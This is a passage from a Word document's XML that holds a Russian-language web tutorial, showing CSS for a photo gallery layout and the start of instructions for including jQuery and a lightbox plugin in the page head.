        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clear:both;</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a, a:visited {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>color:#00BBFF;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text-decoration:none;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>outline:none;</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a:hover{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text-decoration:underline;</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#container{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>width:890px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>margin:20px auto;</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#heading,#footer{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>background-color:#2A2A2A;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>border:1px solid #444444;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>height:20px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>padding:6px 0 25px 15px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>margin-bottom:30px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>overflow:hidden;</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#footer{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>height:10px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>margin:20px 0 20px 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>padding:6px 0 11px 15px;</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 xml:space="preserve">div.nomargin{ /* nomargin </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>класс</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>margin-right:0px;</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.pic{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>float:left;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>margin:0 15px 15px 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>border:5px solid white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>width:200px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>height:250px;</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.pic a{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>width:200px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>height:250px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text-indent:-99999px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>display:block;</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h1{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>font-size:28px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>font-weight:bold;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>font-family:</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trebuchet MS</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,Arial, Helvetica, sans-serif;</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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h2{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>font-weight:normal;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>font-size:14px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>color:white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для правильной работы нам понадобится в шапке документа подключить фреймворк, таблицу стилей и вспомогающие скрипты:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;link rel=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stylesheet</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> type=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text/css</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> href=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lightbox/css/jquery.lightbox-0.5.css</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;link rel=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stylesheet</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> type=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text/css</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> href=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>demo.css</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script type=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text/javascript</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> src=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script type=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text/javascript</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> src=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lightbox/js/jquery.lightbox-0.5.pack.js</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
